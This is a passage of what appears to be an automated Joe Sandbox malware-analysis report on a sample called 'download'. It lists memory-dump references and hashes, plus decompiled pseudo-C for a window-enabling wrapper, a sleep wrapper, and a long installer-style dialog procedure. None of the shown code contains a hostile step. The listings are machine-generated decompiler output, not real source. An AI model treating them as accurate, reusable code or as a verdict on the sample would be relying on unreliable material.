                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                      • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                      • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040403E Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0040403E(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x79f53c, _a4); // executed
				return _t2;
			}




                                                      0x00404048
                                                      0x0040404e

                                                      APIs
                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E1A), ref: 00404048
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CallbackDispatcherUser
                                                      • String ID:
                                                      • API String ID: 2492992576-0
                                                      • Opcode ID: 16589da7e4045b76edf9d30eb88c390adf98e68054f17749ecabb79a433e11f9
                                                      • Instruction ID: 19a36987b167f9348e871b3ba6280065f8d182bcd10231b416c22424f7deb768
                                                      • Opcode Fuzzy Hash: 16589da7e4045b76edf9d30eb88c390adf98e68054f17749ecabb79a433e11f9
                                                      • Instruction Fuzzy Hash: 0DA00176404101EBCB029F54FF08D4ABFA2AFA4705B12C43AE295D4036CA764872FF1D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E004014D6(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402AA9(_t7);
				 *((intOrPtr*)(_t13 - 0x3c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                      0x004014d6
                                                      0x004014d7
                                                      0x004014e0
                                                      0x004014e3
                                                      0x004014e7
                                                      0x004014e7
                                                      0x004014e9
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: e73a92aa41515daeb585d050e8429cc66fc7923e91e6afc56cf09d11a5d12b2a
                                                      • Instruction ID: a830f3fcad8b1b5918cbc0f4af807c6c9b556cc747c31dbb8bc258613536cb5a
                                                      • Opcode Fuzzy Hash: e73a92aa41515daeb585d050e8429cc66fc7923e91e6afc56cf09d11a5d12b2a
                                                      • Instruction Fuzzy Hash: C8D05B73B10141DBD714E7F8BD8485E73B4DB503153204837D441E1091D578C5424A28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 00404A21 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E00404A21(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t179;
				intOrPtr _t180;
				int _t187;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				intOrPtr _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int* _t235;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed int _t244;
				signed int _t247;
				signed char _t248;
				signed int _t249;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				int _t290;
				signed int _t294;
				intOrPtr _t301;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;
				void* _t326;
				void* _t329;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t179 =  *0x7a2f88; // 0xae4f8c
				_t318 = SendMessageA;
				_v20 = _t179;
				_t180 =  *0x7a2f54; // 0xae4de0
				_t282 = 0;
				_v24 = _t180 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t285;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x7a2f5d & 0x00000002;
							if(( *0x7a2f5d & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t282;
								if(_v16 != _t282) {
									_t231 = _v16;
									__eflags =  *((intOrPtr*)(_t231 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t232 + 0xc)) - 2;
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											_t235 = _t233 * 0x418 + _t285 + 8;
											 *_t235 =  *_t235 & 0xffffffdf;
											__eflags =  *_t235;
										} else {
											 *(_t233 * 0x418 + _t285 + 8) =  *(_t233 * 0x418 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E0040496F(_v8, _a8 != 0x413);
								_t311 = _t239;
								__eflags = _t311 - _t282;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x418 + _t88;
									_t241 =  *_t285;
									__eflags = _t241 & 0x00000010;
									if((_t241 & 0x00000010) == 0) {
										__eflags = _t241 & 0x00000040;
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
											__eflags = _t242;
										} else {
											_t248 = _t241 ^ 0x00000080;
											__eflags = _t248;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_t244 =  *0x7a2f5c; // 0x80
										_t247 =  !_t244 >> 0x00000008 & 0x00000001;
										__eflags = _t247;
										_a12 = _t311 + 1;
										_a16 = _t247;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							__eflags =  *((intOrPtr*)(_t285 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t285 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t285 + 4)) - 0x408;
						if( *((intOrPtr*)(_t285 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t282, _t282);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t219 =  *0x79f524;
									__eflags = _t219 - _t282;
									if(_t219 != _t282) {
										ImageList_Destroy(_t219);
									}
									_t220 =  *0x79f538;
									__eflags = _t220 - _t282;
									if(_t220 != _t282) {
										GlobalFree(_t220);
									}
									 *0x79f524 = _t282;
									 *0x79f538 = _t282;
									 *0x7a2fc0 = _t282;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L88:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x7a2f5d & 0x00000001;
										if(( *0x7a2f5d & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t187 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t187;
											_t307 = _t187;
											ShowWindow(_v8, _t307);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
										}
									}
									goto L91;
								} else {
									E004011EF(_t285, _t282, _t282);
									_t192 = _a12;
									__eflags = _t192 - _t282;
									if(_t192 != _t282) {
										__eflags = _t192 - 0xffffffff;
										if(_t192 != 0xffffffff) {
											_t192 = _t192 - 1;
											__eflags = _t192;
										}
										_push(_t192);
										_push(8);
										E004049EF();
									}
									__eflags = _a16 - _t282;
									if(_a16 == _t282) {
										L75:
										E004011EF(_t285, _t282, _t282);
										__eflags =  *0x7a2f8c - _t282; // 0x6
										_v32 =  *0x79f538;
										_t195 =  *0x7a2f88; // 0xae4f8c
										_v60 = 0xf030;
										_v20 = _t282;
										if(__eflags <= 0) {
											L86:
											InvalidateRect(_v8, _t282, 1);
											_t197 =  *0x7a271c; // 0xaea04d
											__eflags =  *((intOrPtr*)(_t197 + 0x10)) - _t282;
											if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
												E0040492A(0x3ff, 0xfffffffb, E00404942(5));
											}
											goto L88;
										} else {
											_t138 = _t195 + 8; // 0xae4f94
											_t308 = _t138;
											do {
												_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
												__eflags = _t201 - _t282;
												if(_t201 != _t282) {
													_t287 =  *_t308;
													_v68 = _t201;
													__eflags = _t287 & 0x00000001;
													_v72 = 8;
													if((_t287 & 0x00000001) != 0) {
														_t147 =  &(_t308[4]); // 0xae4fa4
														_v72 = 9;
														_v56 = _t147;
														_t150 =  &(_t308[0]);
														 *_t150 = _t308[0] & 0x000000fe;
														__eflags =  *_t150;
													}
													__eflags = _t287 & 0x00000040;
													if((_t287 & 0x00000040) == 0) {
														_t205 = (_t287 & 0x00000001) + 1;
														__eflags = _t287 & 0x00000010;
														if((_t287 & 0x00000010) != 0) {
															_t205 = _t205 + 3;
															__eflags = _t205;
														}
													} else {
														_t205 = 3;
													}
													_t290 = (_t287 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t290;
													_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t290, _v68);
													SendMessageA(_v8, 0x110d, _t282,  &_v72);
												}
												_v20 = _v20 + 1;
												_t308 =  &(_t308[0x106]);
												__eflags = _v20 -  *0x7a2f8c; // 0x6
											} while (__eflags < 0);
											goto L86;
										}
									} else {
										_t309 = E004012E2( *0x79f538);
										E00401299(_t309);
										_t216 = 0;
										_t285 = 0;
										__eflags = _t309 - _t282;
										if(_t309 <= _t282) {
											L74:
											SendMessageA(_v12, 0x14e, _t285, _t282);
											_a16 = _t309;
											_a8 = 0x420;
											goto L75;
										} else {
											goto L71;
										}
										do {
											L71:
											_t301 = _v24;
											__eflags =  *((intOrPtr*)(_t301 + _t216 * 4)) - _t282;
											if( *((intOrPtr*)(_t301 + _t216 * 4)) != _t282) {
												_t285 = _t285 + 1;
												__eflags = _t285;
											}
											_t216 = _t216 + 1;
											__eflags = _t216 - _t309;
										} while (_t216 < _t309);
										goto L74;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L91;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L91;
							}
							_t226 = SendMessageA(_v12, 0x147, _t282, _t282);
							__eflags = _t226 - 0xffffffff;
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageA(_v12, 0x150, _t226, _t282);
							__eflags = _t310 - 0xffffffff;
							if(_t310 == 0xffffffff) {
								L54:
								_t310 = 0x20;
								L55:
								E00401299(_t310);
								SendMessageA(_a4, 0x420, _t282, _t310);
								_t119 =  &_a12;
								 *_t119 = _a12 | 0xffffffff;
								__eflags =  *_t119;
								_a16 = _t282;
								_a8 = 0x40f;
								goto L56;
							}
							_t230 = _v24;
							__eflags =  *((intOrPtr*)(_t230 + _t310 * 4)) - _t282;
							if( *((intOrPtr*)(_t230 + _t310 * 4)) != _t282) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					_t249 =  *0x7a2f8c; // 0x6
					_v32 = 0;
					_v16 = 2;
					 *0x7a2fc0 = _t306;
					 *0x79f538 = GlobalAlloc(0x40, _t249 << 2);
					_t252 = LoadBitmapA( *0x7a2f40, 0x6e);
					 *0x79f52c =  *0x79f52c | 0xffffffff;
					_t313 = _t252;
					 *0x79f534 = SetWindowLongA(_v8, 0xfffffffc, E00405018);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f524 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x79f524);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t282, E00405F9F(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E0040401C(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E0040401C(_a4);
					_t316 = 0;
					_t284 = 0;
					_t326 =  *0x7a2f8c - _t316; // 0x6
					if(_t326 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									__eflags = _t271 & 0x00000004;
									if((_t271 & 0x00000004) == 0) {
										 *( *0x79f538 + _t316 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t284 = SendMessageA(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v32 = 1;
									 *( *0x79f538 + _t316 * 4) = _t276;
									_t284 =  *( *0x79f538 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x418]);
							_t329 = _t316 -  *0x7a2f8c; // 0x6
							_v28 = _t302;
						} while (_t329 < 0);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404051(_v8);
								_t282 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404051(_v12);
								L91:
								return E00404083(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}









































































                                                      0x00404a30
                                                      0x00404a41
                                                      0x00404a46
                                                      0x00404a49
                                                      0x00404a4e
                                                      0x00404a54
                                                      0x00404a57
                                                      0x00404a5c
                                                      0x00404a6a
                                                      0x00404a6d
                                                      0x00404c8d
                                                      0x00404c8d
                                                      0x00404c94
                                                      0x00404ca8
                                                      0x00404c96
                                                      0x00404c98
                                                      0x00404c9b
                                                      0x00404c9c
                                                      0x00404ca3
                                                      0x00404ca3
                                                      0x00404cab
                                                      0x00404cb4
                                                      0x00404cbf
                                                      0x00404cbf
                                                      0x00404cc2
                                                      0x00404cc5
                                                      0x00404cd4
                                                      0x00404cd4
                                                      0x00404cdb
                                                      0x00404d50
                                                      0x00404d50
                                                      0x00404d53
                                                      0x00404d55
                                                      0x00404d58
                                                      0x00404d5f
                                                      0x00404d6d
                                                      0x00404d6d
                                                      0x00404d6f
                                                      0x00404d72
                                                      0x00404d79
                                                      0x00404d7b
                                                      0x00404d7f
                                                      0x00404d82
                                                      0x00404d85
                                                      0x00404d9c
                                                      0x00404da0
                                                      0x00404da0
                                                      0x00404d87
                                                      0x00404d91
                                                      0x00404d91
                                                      0x00404d85
                                                      0x00404d79
                                                      0x00000000
                                                      0x00404d53
                                                      0x00404cdd
                                                      0x00404ce0
                                                      0x00404ceb
                                                      0x00404ced
                                                      0x00404cf0
                                                      0x00404cf7
                                                      0x00404cfc
                                                      0x00404cfe
                                                      0x00404d00
                                                      0x00404d0b
                                                      0x00404d0b
                                                      0x00404d0f
                                                      0x00404d11
                                                      0x00404d13
                                                      0x00404d15
                                                      0x00404d17
                                                      0x00404d2a
                                                      0x00404d2a
                                                      0x00404d19
                                                      0x00404d19
                                                      0x00404d1e
                                                      0x00404d20
                                                      0x00404d26
                                                      0x00404d22
                                                      0x00404d22
                                                      0x00404d22
                                                      0x00404d20
                                                      0x00404d2e
                                                      0x00404d30
                                                      0x00404d35
                                                      0x00404d40
                                                      0x00404d40
                                                      0x00404d43
                                                      0x00404d46
                                                      0x00404d49
                                                      0x00404d49
                                                      0x00404d13
                                                      0x00000000
                                                      0x00404d00
                                                      0x00404ce2
                                                      0x00404ce5
                                                      0x00404ce9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404ce9
                                                      0x00404cc7
                                                      0x00404cce
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404cb6
                                                      0x00404cb6
                                                      0x00404cb9
                                                      0x00404da3
                                                      0x00404da3
                                                      0x00404daa
                                                      0x00404e1b
                                                      0x00404e20
                                                      0x00404e23
                                                      0x00404e2b
                                                      0x00404e2b
                                                      0x00404e2d
                                                      0x00404e34
                                                      0x00404e36
                                                      0x00404e3b
                                                      0x00404e3d
                                                      0x00404e40
                                                      0x00404e40
                                                      0x00404e46
                                                      0x00404e4b
                                                      0x00404e4d
                                                      0x00404e50
                                                      0x00404e50
                                                      0x00404e56
                                                      0x00404e5c
                                                      0x00404e62
                                                      0x00404e62
                                                      0x00404e68
                                                      0x00404e6f
                                                      0x00404fc5
                                                      0x00404fc5
                                                      0x00404fcc
                                                      0x00404fce
                                                      0x00404fd5
                                                      0x00404fd9
                                                      0x00404fe6
                                                      0x00404fe6
                                                      0x00404fe9
                                                      0x00404fef
                                                      0x00405001
                                                      0x00405001
                                                      0x00404fd5
                                                      0x00000000
                                                      0x00404e75
                                                      0x00404e77
                                                      0x00404e7c
                                                      0x00404e7f
                                                      0x00404e81
                                                      0x00404e83
                                                      0x00404e86
                                                      0x00404e88
                                                      0x00404e88
                                                      0x00404e88
                                                      0x00404e89
                                                      0x00404e8a
                                                      0x00404e8c
                                                      0x00404e8c
                                                      0x00404e91
                                                      0x00404e94
                                                      0x00404ed5
                                                      0x00404ed7
                                                      0x00404ee1
                                                      0x00404ee7
                                                      0x00404eea
                                                      0x00404eef
                                                      0x00404ef6
                                                      0x00404ef9
                                                      0x00404f9b
                                                      0x00404fa1
                                                      0x00404fa7
                                                      0x00404fac
                                                      0x00404faf
                                                      0x00404fc0
                                                      0x00404fc0
                                                      0x00000000
                                                      0x00404eff
                                                      0x00404eff
                                                      0x00404eff
                                                      0x00404f02
                                                      0x00404f08
                                                      0x00404f0b
                                                      0x00404f0d
                                                      0x00404f0f
                                                      0x00404f11
                                                      0x00404f14
                                                      0x00404f17
                                                      0x00404f1e
                                                      0x00404f20
                                                      0x00404f23
                                                      0x00404f2a
                                                      0x00404f2d
                                                      0x00404f2d
                                                      0x00404f2d
                                                      0x00404f2d
                                                      0x00404f31
                                                      0x00404f34
                                                      0x00404f40
                                                      0x00404f41
                                                      0x00404f44
                                                      0x00404f46
                                                      0x00404f46
                                                      0x00404f46
                                                      0x00404f36
                                                      0x00404f38
                                                      0x00404f38
                                                      0x00404f65
                                                      0x00404f65
                                                      0x00404f66
                                                      0x00404f72
                                                      0x00404f81
                                                      0x00404f81
                                                      0x00404f83
                                                      0x00404f86
                                                      0x00404f8f
                                                      0x00404f8f
                                                      0x00000000
                                                      0x00404f02
                                                      0x00404e96
                                                      0x00404ea1
                                                      0x00404ea4
                                                      0x00404ea9
                                                      0x00404eab
                                                      0x00404ead
                                                      0x00404eaf
                                                      0x00404ebf
                                                      0x00404ec9
                                                      0x00404ecb
                                                      0x00404ece
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404eb1
                                                      0x00404eb1
                                                      0x00404eb1
                                                      0x00404eb4
                                                      0x00404eb7
                                                      0x00404eb9
                                                      0x00404eb9
                                                      0x00404eb9
                                                      0x00404eba
                                                      0x00404ebb
                                                      0x00404ebb
                                                      0x00000000
                                                      0x00404eb1
                                                      0x00404e94
                                                      0x00404e6f
                                                      0x00404dac
                                                      0x00404db2
                                                      0x00000000
                                                      0x00000000
                                                      0x00404dbe
                                                      0x00404dc2
                                                      0x00000000
                                                      0x00000000
                                                      0x00404dd2
                                                      0x00404dd4
                                                      0x00404dd7
                                                      0x00000000
                                                      0x00000000
                                                      0x00404de9
                                                      0x00404deb
                                                      0x00404dee
                                                      0x00404df8
                                                      0x00404dfa
                                                      0x00404dfb
                                                      0x00404dfc
                                                      0x00404e0b
                                                      0x00404e0d
                                                      0x00404e0d
                                                      0x00404e0d
                                                      0x00404e11
                                                      0x00404e14
                                                      0x00000000
                                                      0x00404e14
                                                      0x00404df0
                                                      0x00404df3
                                                      0x00404df6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00404df6
                                                      0x00000000
                                                      0x00404cb9
                                                      0x00404a73
                                                      0x00404a73
                                                      0x00404a78
                                                      0x00404a81
                                                      0x00404a88
                                                      0x00404a96
                                                      0x00404aa1
                                                      0x00404aa7
                                                      0x00404ab5
                                                      0x00404ac9
                                                      0x00404ace
                                                      0x00404adb
                                                      0x00404ae0
                                                      0x00404af6
                                                      0x00404b07
                                                      0x00404b14
                                                      0x00404b14
                                                      0x00404b17
                                                      0x00404b1d
                                                      0x00404b1f
                                                      0x00404b22
                                                      0x00404b27
                                                      0x00404b2c
                                                      0x00404b2e
                                                      0x00404b2e
                                                      0x00404b4e
                                                      0x00404b4e
                                                      0x00404b50
                                                      0x00404b51
                                                      0x00404b56
                                                      0x00404b59
                                                      0x00404b5c
                                                      0x00404b60
                                                      0x00404b65
                                                      0x00404b6a
                                                      0x00404b6e
                                                      0x00404b73
                                                      0x00404b78
                                                      0x00404b7a
                                                      0x00404b7c
                                                      0x00404b82
                                                      0x00404c4c
                                                      0x00404c5f
                                                      0x00000000
                                                      0x00404b88
                                                      0x00404b8b
                                                      0x00404b8e
                                                      0x00404b91
                                                      0x00404b91
                                                      0x00404b97
                                                      0x00404b9d
                                                      0x00404ba0
                                                      0x00404ba6
                                                      0x00404ba7
                                                      0x00404bac
                                                      0x00404bb5
                                                      0x00404bbc
                                                      0x00404bbf
                                                      0x00404bc2
                                                      0x00404bc5
                                                      0x00404bff
                                                      0x00404c01
                                                      0x00404c2a
                                                      0x00404c03
                                                      0x00404c10
                                                      0x00404c10
                                                      0x00404bc7
                                                      0x00404bca
                                                      0x00404bd9
                                                      0x00404be3
                                                      0x00404beb
                                                      0x00404bf2
                                                      0x00404bfa
                                                      0x00404bfa
                                                      0x00404bc5
                                                      0x00404c30
                                                      0x00404c31
                                                      0x00404c37
                                                      0x00404c3d
                                                      0x00404c3d
                                                      0x00404c4a
                                                      0x00404c65
                                                      0x00404c69
                                                      0x00404c86
                                                      0x00404c8b
                                                      0x00404c8b
                                                      0x00000000
                                                      0x00404c6b
                                                      0x00404c70
                                                      0x00404c79
                                                      0x00405003
                                                      0x00405015
                                                      0x00405015
                                                      0x00404c69
                                                      0x00000000
                                                      0x00404c4a
                                                      0x00404b82

                                                      APIs
                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A39
                                                      • GetDlgItem.USER32(?,00000408), ref: 00404A44
                                                      • GlobalAlloc.KERNEL32(00000040,00000006), ref: 00404A8E
                                                      • LoadBitmapA.USER32(0000006E), ref: 00404AA1
                                                      • SetWindowLongA.USER32(?,000000FC,00405018), ref: 00404ABA
